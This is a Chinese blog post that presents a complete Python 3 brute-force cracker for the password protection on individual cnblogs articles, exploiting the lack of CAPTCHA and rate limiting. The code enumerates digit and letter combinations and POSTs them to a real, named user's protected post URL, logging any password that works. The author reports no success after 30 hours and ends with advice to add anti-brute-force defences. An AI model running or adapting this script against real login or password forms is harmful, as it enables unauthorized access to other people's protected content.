• 一个最简单的博客园文章密码暴力破解器-python3实现


    我之前想写路由器的密码暴力破解器,我手上只有极路由,发现极路由有安全限制,只能允许连续10次密码错误,所以我改拿博客园练手。
    博客园的博客有个功能是给博文设置一个密码,输入正确的密码才能看到文章的内容。经过测试发现这个密码验证功能,既没有验证码也没有提交频率的限制,
    要写这个针对博客园的密码暴力破解器模型会非常简单,很好实现。

    比如打开这个博文,会显示一个密码输入框:http://www.cnblogs.com/post/readauth?url=/muer/archive/2011/11/27/factualism.html

    我之前没有写过这样的程序,也没有看过别人写这类功能的代码,就按我自己所理解的想法来写一个最简单的密码破解器,不要多线程,不要分布式,
    这个程序会有这么两个部分:

    1、我需要一个生成器,可以不停的生成所有可能的密码组合,比如生成a,b,c,aa,bb,cc,ab,ac...abc,cba...abcd...等等所有的密码组合。
    2、我需要不停的提交密码,直到认为密码正确,记录密码,退出程序。

    -_-!为什么使用生成器?
    python2中range() 不是一个生成器,当你range(N),N为一个很大的数时...python就会爆炸!!!哈哈哈..

    写细致的博客太消耗时间和心力,我这里不写具体的分析过程了,后面直接上代码,如果看不懂,查相关关键词就可以,毕竟基础教程性的文章和内容非常之多。

    tqdm是一个python进度条库,requests是一个简单优雅的http库,
    product是python3的标准库itertools下的函数,可以用生成 (a,b,c...) (c,b,a...)这样的序列,用''.join连接起来就得到了"abc"这样的一个密码。

    代码如下:

    """
    python3暴力穷举密码
    2016年6月09日 04:39:25  codegay
    """
    from time import strftime
    from itertools import product
    from time import sleep
    from tqdm import tqdm
    import requests
    from requests import post
    
    
    #密码生成器
    def psgen(x=4):
        iter = ['1234567890',
                'abcdefghijklmnopqrstuvwxyz',
                'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
    
                ]
        for r in iter:
            for repeat in range(1,x+1):
                for ps in product(r,repeat=repeat):
                    yield ''.join(ps)
    
    
    def fx(url):
    #把URL中的readauth字符删掉,替换成"http://www.cnblogs.com/muer/archive/2011/11/27/factualism.html"这样的格式,因为这个才POST的目标地址。
        url = url.replace("/post/readauth?url=", "")
        for ps in tqdm(psgen(6)):
            try:
                rs=post(url,data={'tb_password':ps},allow_redirects=1)
                if rs.url == url:  #如果提交密码后,返回的url得到为"http://www.cnblogs.com/muer/archive/2011/11/27/factualism.html"这样的形式,那么认为猜到正确的密码了。
                    with open("resut.csv","a+") as f:
                        f.write('密码破解成功结果为:,'+ ps + ',' + strftime("%c") + ',' + url+'
    ')
                    break
            except:
                sleep(1)
                pass
    
    url='http://www.cnblogs.com/post/readauth?url=/muer/archive/2011/11/27/factualism.html'
    fx(url)
    

    最后,这个程序运行速度大约是每秒提交6次密码,我运行了30个小时,也不过是迭代几十万次,并没有能把密码破解出来,没有产生实质性的危害。

    总结:
    1、密码验证的地方适当增加一些防止暴力破解的手段。
    2、仍然有必要使用复杂的密码提高安全度。虽然这样的一个简单的程序并没有什么卵用

  • 相关阅读:
    使用气泡图分析产品价格变动带来的影响
    如果数据太“ 脏 ”,你知道如何处理吗?
    Power BI文件夹管理,99%的人都不知道的技巧
    如果数据太“ 脏 ”,你知道如何处理吗?
    Power BI文件夹管理,99%的人都不知道的技巧
    微软Power BI 每月功能更新系列——Power BI 3月版本功能更新新鲜出炉
    textarea右下角黑点
    CSS布局-body高度不等于页面高度
    PS切图采坑
    诡异的bug!!
  • 原文地址:https://www.cnblogs.com/gayhub/p/5586099.html
Copyright © 2020-2023  润新知